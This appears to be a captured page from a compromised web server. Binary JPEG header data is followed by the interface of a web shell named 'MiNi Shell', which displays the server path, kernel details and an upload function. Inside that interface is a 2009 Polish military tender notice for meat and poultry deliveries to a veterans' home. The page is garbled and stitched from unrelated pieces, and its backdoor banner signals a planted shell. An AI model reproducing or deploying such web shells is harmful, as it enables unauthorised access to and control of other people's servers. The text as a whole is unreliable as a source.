JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090210/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090210/23008-N-2009.html

<p class="kh_header"><b>Warszawa: Zakup i dostawa artykułów żywnościowych (mięsa i produktów mięsnych, wędlin; mięso drobiowe i wyroby drobiowe) na potrzeby Domu Emeryta Wojskowego.</b><br>
<b>Numer ogłoszenia: 23008 - 2009; data zamieszczenia: 10.02.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Jednostka Wojskowa 2063 , ul. Banacha 2, 02-097 Warszawa, woj. mazowieckie, tel. 022 6824581, 6824375, 6824121, faks 022 6824108.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: jednostka wojskowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zakup i dostawa artykułów żywnościowych (mięsa i produktów mięsnych, wędlin; mięso drobiowe i wyroby drobiowe) na potrzeby Domu Emeryta Wojskowego..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest:
w części I zamówienia: 
mięso i produkty mięsne, wędliny - kod CPV 15.11.00.02 mięso i wyroby wędliniarskie
w części II zamówienia: 
mięso drobiowe - kod CPV 15.11.21.00 drób
w części III zamówienia:
 wyroby drobiowe - kod CPV 15.13.11.35 produkty drobiowe
Szczegółowy opis przedmiotu zamówienia znajduje się w załączniku nr 2 do niniejszej specyfikacji.
Zamawiający rozstrzygnie zamówienie publiczne, gdy:
 wpłynie co najmniej jedna nie podlegająca odrzuceniu oferta na poszczególne części zamówienia,
 oferta w poszczególnych częściach będzie całkowita.
Sposób i termin dostawy:
 dostawy realizowane będą transportem Wykonawcy i na jego koszt do stołówki Domu Emeryta Wojskowego zlokalizowanej w Warszawie ul. Pirenejskiej 5
 cały asortyment wytwarza, przechowuje i dostarcza do Zamawiającego Wykonawca zgodnie z zamówieniem
 wielkość dostaw określana będzie przez Zamawiającego telefonicznie 
z dwudniowym wyprzedzeniem
 zamawiający zastrzega, że faktyczna liczba zrealizowanych dostaw będzie zależna od potrzeb, a określenie w umowie maksymalnych nieprzekraczalnych ilości nie może 
w razie mniejszych potrzeb być podstawą roszczeń ze strony Wykonawcy.
Cena artykułów żywnościowych mięso i produkty mięsne może ulec zmianie o średnioroczny wskaźnik zmiany cen, ogłoszony przez Główny Urząd Statystyczny na wniosek zainteresowanej strony..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 15.11.00.00-2.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 28.02.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
<p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> WYKONAWCY ubiegający się o niniejsze zamówienie muszą spełniać warunki wynikające z art. 22 ustawy Pzp, co potwierdza się złożeniem oświadczenia( zał. nr 3 do SIWZ)
1)	posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień, tj.: 
- aktualny odpis z właściwego rejestru sądowego(KRS) lub zaświadczenie o wpisie   do ewidencji działalności gospodarczej;
- decyzje Państwowego Inspektoratu Sanitarnego lub Państwowego Inspektora Weterynaryjnego;
                - upoważnienie pełnomocnictwo do reprezentowania firmy, podpisywania oferty
    i innych dokumentów ofertowych, jeżeli nie wynika to z innych dokumentów;
2)	posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznymi osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i  osób zdolnych do wykonania zamówienia;
3)	znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia; 
 4)    nie podlegają wykluczeniu z postępowania o udzielenie zamówienia (art. 24 ust.1 i 2      ustawy), tj. posiadają: 
	- aktualną informację z Krajowego Rejestru Karnego;
	- aktualne zaświadczenie z Urzędu Skarbowego;
	- aktualne zaświadczenie z Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego ubezpieczenia Społecznego Ponadto opłacanych składkach.
    Ponadto w przypadku, gdy przedmiot zamówienia będzie realizowany we współpracy 
z innym WYKONAWCĄ powinien on posiadać umowę regulującą współpracę podmiotów występujących wspólnie określającą jednoznacznie sposób reprezentowania wspólników.
    Oferta musi być zgodna ze wszystkimi wymogami Specyfikacji Istotnych Warunków Zamówienia oraz zasadami ustawy, co do sposobu jej przygotowania oraz warunków realizacji zamówienia. 
    Ocena spełniania ww warunków dokonana zostanie zgodnie z formułą spełnia - nie spełnia, w oparciu o informacje zawarte w dokumentach i oświadczeniach wyszczególnionych w pkt 6 niniejszej SIWZ. Z treści załączonych dokumentów musi wynikać jednoznacznie, iż ww warunki WYKONAWCA spełnił. 
   Uzupełnienie wymaganych dokumentów jest możliwe po upływie terminu składania ofert na wezwanie ZAMAWIAJĄCEGO, chyba że mimo ich uzupełnienia konieczne byłoby unieważnienie postępowania. Nie spełnienie chociażby jednego z ww warunków, po wezwaniu przez Zamawiającego, skutkować będzie wykluczeniem Wykonawcy 
z postępowania..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Na potwierdzenie spełnienia warunków określonych w pkt. 5 wszyscy WYKONAWCY muszą złożyć następujące dokumenty i oświadczenia:
1)	aktualny odpis z właściwego rejestru sądowego (KRS) lub aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;
2)	aktualną decyzję wydaną przez właściwy organ Państwowej Inspekcji Sanitarnej lub Państwową Inspekcję Weterynaryjną o spełnianiu wymagań koniecznych do zapewnienia higieny w procesie produkcji lub w obrocie oraz do zapewnienia właściwej jakości zdrowotnej tych artykułów (na podstawie Ustawy z dnia 25 sierpnia 2006r.  Dz. U. Nr 171/2006 poz. 1225 o bezpieczeństwie żywności i żywienia oraz na podstawie Ustawy z dnia 16 grudnia 2005r.  Dz. U. Nr 17/2006 poz. 127 o produktach pochodzenia zwierzęcego);
3)	zaświadczenie z właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzających odpowiednio, że WYKONAWCA nie zalega z opłacaniem składek na ubezpieczenie społeczne lub zdrowotne lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert,
4)	zaświadczenie z właściwego Urzędu Skarbowego potwierdzającego odpowiednio, że WYKONAWCA nie zalega z opłacaniem podatków i opłat lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert, 
5)	aktualnej informacji z Krajowego Rejestru Karnego albo równoważnego zaświadczenia właściwego organu sądowego lub administracyjnego kraju pochodzenia osoby w zakresie określonym w art. 24 ust. 1 pkt 4 - 8 ustawy, wystawionych nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert; 
6)	aktualnej informacji z KRK w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawionych nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert; 
7)	protokół kontroli sanitarnej właściwego organu w zakresie bezpieczeństwa żywności o prawidłowości stosowania zasad systemu HACCP (na podstawie art. 73 ust 1 pkt 1c Ustawy z dnia 25 sierpnia 2006r.  Dz. U. Nr 171/2006 poz. 1225 o bezpieczeństwie żywności i żywienia);
8)	zestawienia posiadanych specjalistycznych środków transportu dopuszczonych do transportu artykułów środków spożywczych wydane przez właściwy Inspektorat Sanitarny;
9)	wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, co najmniej 2 dostaw w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, każda na wartość nie mniejszą niż: dla części I zamówienia - 50.000,00 zł; dla części II zamówienia - 20.000,00 zł; dla części III zamówienia - 20.000,00 zł; odpowiadających swoim rodzajem dostawom stanowiącym przedmiot zamówienia, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców oraz dokumentami  potwierdzającymi, że te dostawy zostały wykonane należycie, na formularzu określonym 
w załącznika nr 4; 
10)	oświadczenie pisemne o spełnianiu warunków, o których mowa w art. 22 ust. 1 Prawa zamówień publicznych (na formularzu ofertowym określonym w zał. nr 3 do SIWZ),
1. Wyżej wymienione dokumenty dostarcza się w oryginale lub kserokopii poświadczonych za zgodność z oryginałem przez WYKONAWCĘ.
2. W przypadku nie złożenia zastrzeżenia, o którym mowa w art. 8 ust. 3 ustawy Pzp, ZAMAWIAJĄCY może udostępnić ofertę wraz z załącznikami zainteresowanym  WYKONAWCOM..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.jw2063.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Jw 2063 ul. Banacha 2, 00-909 Warszawa.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 19.02.2009 godzina 09:00, miejsce: Kancelaria JW 2063, ul. Banacha 2, 00-909 Warszawa.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> mięso i produkty mięsne, wędliny - kod CPV 15.11.00.02 (mięso i wyroby wędliniarskie);.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> mięso i produkty mięsne, wędliny - kod CPV 15.11.00.02 (mięso i wyroby wędliniarskie);.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.11.00.00-2.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 28.02.2010.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> mięso drobiowe - kod CPV 15.11.21.00 (drób);.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> mięso drobiowe - kod CPV 15.11.21.00 (drób);.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.11.21.00-0.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 28.02.2010.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> wyroby drobiowe - kod CPV 15.13.11.35 (produkty drobiowe)..</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> wyroby drobiowe - kod CPV 15.13.11.35 (produkty drobiowe)..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.13.11.35-0.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 28.02.2010.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com